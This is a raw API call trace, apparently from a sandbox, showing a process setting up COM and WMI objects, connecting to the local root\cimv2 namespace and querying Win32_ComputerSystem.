	[0200.111] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11b40, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd15ba0) returned 0x0
	[0200.112] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd15ba0) returned 0x0
	[0200.112] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0200.112] WbemDefPath:IUnknown:AddRef (This=0x1cd15ba0) returned 0x3
	[0200.112] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0200.112] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b83aa40) returned 0x0
	[0200.113] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83aa40, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.113] WbemDefPath:IUnknown:Release (This=0x1b83aa40) returned 0x3
	[0200.113] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0200.113] WbemDefPath:IUnknown:AddRef (This=0x1cd15ba0) returned 0x4
	[0200.113] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0200.113] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x3
	[0200.113] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x2
	[0200.114] WbemDefPath:IUnknown:Release (This=0x1cd11b40) returned 0x0
	[0200.114] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x1
	[0200.114] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0200.114] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0200.114] WbemDefPath:IUnknown:AddRef (This=0x1cd15ba0) returned 0x2
	[0200.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd15ba0) returned 0x0
	[0200.114] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x2
	[0200.114] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x1
	[0200.114] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0200.114] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0200.114] WbemDefPath:IUnknown:AddRef (This=0x1cd15ba0) returned 0x2
	[0200.115] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd15ba0, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd15ba0) returned 0x0
	[0200.115] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x2
	[0200.115] WbemDefPath:IUnknown:AddRef (This=0x1cd15ba0) returned 0x3
	[0200.115] WbemDefPath:IWbemPath:SetText (This=0x1cd15ba0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.115] WbemDefPath:IUnknown:Release (This=0x1cd15ba0) returned 0x2
	[0200.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0200.115] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0200.115] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0200.115] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0200.115] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.115] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0200.116] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0200.116] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0200.116] IUnknown:Release (This=0x321868) returned 0x1
	[0200.116] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd11be0) returned 0x0
	[0200.116] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11be0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0200.116] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd11be0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd11c00) returned 0x0
	[0200.116] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11c00, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd11c00) returned 0x0
	[0200.117] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11c00, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0200.117] WbemLocator:IUnknown:AddRef (This=0x1cd11c00) returned 0x3
	[0200.117] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0200.117] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11c00, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0200.117] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0200.117] WbemLocator:IUnknown:AddRef (This=0x1cd11c00) returned 0x4
	[0200.117] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11c00, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0200.118] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x3
	[0200.118] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x2
	[0200.118] WbemLocator:IUnknown:Release (This=0x1cd11be0) returned 0x0
	[0200.118] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x1
	[0200.118] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0200.118] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0200.118] WbemLocator:IUnknown:AddRef (This=0x1cd11c00) returned 0x2
	[0200.118] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11c00, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd11c00) returned 0x0
	[0200.118] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x2
	[0200.119] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x1
	[0200.119] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0200.119] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0200.119] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.119] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd11c20) returned 0x0
	[0200.119] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd11c20, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd1aad8) returned 0x0
	[0200.926] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b83c2c0) returned 0x0
	[0200.926] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b83c2c0, pProxy=0x1cd1aad8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0200.926] WbemLocator:IUnknown:Release (This=0x1b83c2c0) returned 0x1
	[0200.926] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aad8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b83c300) returned 0x0
	[0200.926] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b83c2c0) returned 0x0
	[0200.926] WbemLocator:IClientSecurity:SetBlanket (This=0x1b83c2c0, pProxy=0x1cd1aad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.926] WbemLocator:IUnknown:Release (This=0x1b83c2c0) returned 0x2
	[0200.926] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x1
	[0200.926] CoTaskMemFree (pv=0x1b839890) 
	[0200.926] WbemLocator:IUnknown:Release (This=0x1cd11c20) returned 0x0
	[0200.926] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aad8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b83c300) returned 0x0
	[0200.927] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0200.927] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0200.928] WbemLocator:IUnknown:AddRef (This=0x1b83c300) returned 0x3
	[0200.928] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0200.928] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b83c1e8) returned 0x0
	[0200.928] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c1e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.928] WbemLocator:IUnknown:Release (This=0x1b83c1e8) returned 0x3
	[0200.928] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0200.928] WbemLocator:IUnknown:AddRef (This=0x1b83c300) returned 0x4
	[0200.928] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b83c2d0) returned 0x0
	[0200.928] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x4
	[0200.929] WbemLocator:IRpcOptions:Query (in: This=0x1b83c2d0, pPrx=0x1b83c300, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0200.929] WbemLocator:IUnknown:Release (This=0x1b83c2d0) returned 0x3
	[0200.929] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x2
	[0200.929] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0200.929] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0200.929] WbemLocator:IUnknown:AddRef (This=0x1b83c300) returned 0x3
	[0200.929] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd1aad8) returned 0x0
	[0200.929] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x3
	[0200.929] WbemLocator:IUnknown:Release (This=0x1cd1aad8) returned 0x2
	[0200.929] WbemLocator:IUnknown:Release (This=0x1cd1aad8) returned 0x1
	[0200.930] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0200.930] WbemLocator:IUnknown:AddRef (This=0x1b83c300) returned 0x2
	[0200.930] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b83c300) returned 0x0
	[0200.930] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x2
	[0200.930] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x1
	[0200.930] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0200.930] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0200.930] WbemLocator:IUnknown:AddRef (This=0x1b83c300) returned 0x2
	[0200.930] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c300, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd1aad8) returned 0x0
	[0200.930] WbemLocator:IUnknown:Release (This=0x1b83c300) returned 0x2
	[0200.931] WbemLocator:IUnknown:AddRef (This=0x1cd1aad8) returned 0x3
	[0200.931] IWbemServices:ExecQuery (in: This=0x1cd1aad8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd16188) returned 0x0
	[0200.936] IUnknown:QueryInterface (in: This=0x1cd16188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd16190) returned 0x0
	[0200.936] IClientSecurity:QueryBlanket (in: This=0x1cd16190, pProxy=0x1cd16188, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0200.936] IUnknown:Release (This=0x1cd16190) returned 0x1
	[0200.936] IUnknown:QueryInterface (in: This=0x1cd16188, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b83c180) returned 0x0
	[0200.936] IUnknown:QueryInterface (in: This=0x1cd16188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd16190) returned 0x0
	[0200.937] IClientSecurity:SetBlanket (This=0x1cd16190, pProxy=0x1cd16188, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.938] IUnknown:Release (This=0x1cd16190) returned 0x2
	[0200.938] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x1
	[0200.938] CoTaskMemFree (pv=0x1b8399e0) 
	[0200.938] IUnknown:QueryInterface (in: This=0x1cd16188, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b83c180) returned 0x0
	[0200.939] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0200.939] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0200.940] WbemLocator:IUnknown:AddRef (This=0x1b83c180) returned 0x3
	[0200.940] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0200.940] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b83c068) returned 0x0
	[0200.940] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c068, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.940] WbemLocator:IUnknown:Release (This=0x1b83c068) returned 0x3
	[0200.940] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0200.940] WbemLocator:IUnknown:AddRef (This=0x1b83c180) returned 0x4
	[0200.940] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b83c150) returned 0x0
	[0200.940] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x4
	[0200.940] WbemLocator:IRpcOptions:Query (in: This=0x1b83c150, pPrx=0x1b83c180, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0200.940] WbemLocator:IUnknown:Release (This=0x1b83c150) returned 0x3
	[0200.941] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x2
	[0200.941] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0200.941] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0200.941] WbemLocator:IUnknown:AddRef (This=0x1b83c180) returned 0x3
	[0200.941] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c180, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd16188) returned 0x0
